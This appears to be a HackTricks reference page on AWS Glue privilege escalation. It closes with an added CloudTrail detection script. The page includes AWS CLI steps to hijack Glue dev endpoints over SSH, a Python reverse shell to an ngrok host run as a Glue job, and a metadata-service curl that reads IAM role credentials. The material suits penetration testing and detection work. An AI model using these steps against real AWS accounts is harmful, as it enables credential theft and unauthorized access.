AWS - Glue Privesc


tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with these permissions can set up a new AWS Glue development endpoint, assigning to it an existing service role that Glue can assume and that carries the permissions of interest.

Once it is set up, the attacker can reach the endpoint instance over SSH and steal the IAM credentials of the assigned role:

```bash
# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name <endpoint-name>

# SSH with the glue user
ssh -i /tmp/private.key glue@ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
```

For stealth purposes, it is recommended to use the IAM credentials from inside the Glue virtual machine.

Potential Impact: Privesc to the glue service role specified.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Users with this permission can change the SSH key of an existing Glue development endpoint, enabling SSH access to it. This allows the attacker to execute commands with the privileges of the role attached to the endpoint:

```bash
# Change public key to connect
aws glue update-dev-endpoint --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name target_endpoint

# SSH with the glue user
ssh -i /tmp/private.key glue@ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
```

Potential Impact: Privesc to the glue service role used.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Users with iam:PassRole combined with either glue:CreateJob or glue:UpdateJob, plus glue:StartJobRun or glue:CreateTrigger, can create or update an AWS Glue job, attach any Glue service role, and start the job's execution. The job can run arbitrary Python code, which can be exploited to set up a reverse shell. That reverse shell can then be used to exfiltrate the IAM credentials of the role associated with the Glue job, leading to unauthorized access or actions based on that role's permissions:

```bash
# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
# Glue schedules use the cron(...) expression format
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "cron(0/5 * * * ? *)"  #Every 5mins, feel free to change
```

Potential Impact: Privesc to the glue service role specified.

glue:UpdateJob

With just the update permission, an attacker could steal the IAM credentials of the role that is already attached to the job.

Potential Impact: Privesc to the glue service role already attached.
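As an added detection example (not part of the original page), the following script flags CloudTrail records that match the four escalation paths described above: a dev endpoint created with an SSH key and a passed role, an SSH key added to an existing endpoint, and a job defined with a role and then started or scheduled by the same principal shortly afterwards. The sample events are constructed, and the camelCase requestParameters field names (endpointName, publicKey, addPublicKeys, role, jobName, actions) are assumed to match what CloudTrail logs for Glue.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample CloudTrail records: account id, principals and keys are made up.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "glue.amazonaws.com", "eventName": "CreateDevEndpoint",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
     "requestParameters": {"endpointName": "privesctest", "publicKey": "ssh-rsa AAAA...",
                           "roleArn": "arn:aws:iam::111122223333:role/GlueAdmin"}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventSource": "glue.amazonaws.com", "eventName": "UpdateDevEndpoint",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/bob"},
     "requestParameters": {"endpointName": "etl-endpoint", "addPublicKeys": ["ssh-rsa BBBB..."]}},
    {"eventTime": "2024-05-01T11:00:00Z", "eventSource": "glue.amazonaws.com", "eventName": "CreateJob",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/carol"},
     "requestParameters": {"name": "nightly-etl", "role": "arn:aws:iam::111122223333:role/GlueAdmin"}},
    {"eventTime": "2024-05-01T11:02:00Z", "eventSource": "glue.amazonaws.com", "eventName": "StartJobRun",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/carol"},
     "requestParameters": {"jobName": "nightly-etl"}},
    # A routine run by a scheduler role that never (re)defined the job: must not be flagged.
    {"eventTime": "2024-05-02T09:00:00Z", "eventSource": "glue.amazonaws.com", "eventName": "StartJobRun",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/scheduler"},
     "requestParameters": {"jobName": "nightly-etl"}},
]

def _ts(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_glue_privesc(events, window=timedelta(hours=1)):
    """Return (actor_arn, reason) tuples for Glue calls matching the escalation paths."""
    findings = []
    recent_job_defs = defaultdict(dict)  # job name -> {actor: time of its last CreateJob/UpdateJob}
    for ev in sorted(events, key=_ts):
        if ev.get("eventSource") != "glue.amazonaws.com":
            continue
        name, p = ev["eventName"], ev.get("requestParameters") or {}
        actor, when = ev["userIdentity"].get("arn", "?"), _ts(ev)
        if name == "CreateDevEndpoint" and "publicKey" in p:  # path 1: new endpoint + SSH key + passed role
            findings.append((actor, f"CreateDevEndpoint {p.get('endpointName')} with SSH key, role {p.get('roleArn')}"))
        elif name == "UpdateDevEndpoint" and ({"publicKey", "addPublicKeys"} & p.keys()):  # path 2: key swap
            findings.append((actor, f"UpdateDevEndpoint {p.get('endpointName')} changed SSH public key"))
        elif name in ("CreateJob", "UpdateJob") and "role" in p:  # path 3/4: job (re)defined with a role
            recent_job_defs[p.get("name")][actor] = when
        elif name in ("StartJobRun", "CreateTrigger"):  # ... then run or scheduled by the same principal
            jobs = [p.get("jobName")] if name == "StartJobRun" else [a.get("jobName") for a in p.get("actions", [])]
            for job in jobs:
                defined = recent_job_defs.get(job, {}).get(actor)
                if defined is not None and when - defined <= window:
                    findings.append((actor, f"{name} on job {job} {int((when - defined).total_seconds())}s after defining it"))
    return findings
```

Feed it the records from a CloudTrail lookup or an S3 trail export; each finding names the principal to review and the role it may have reached.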
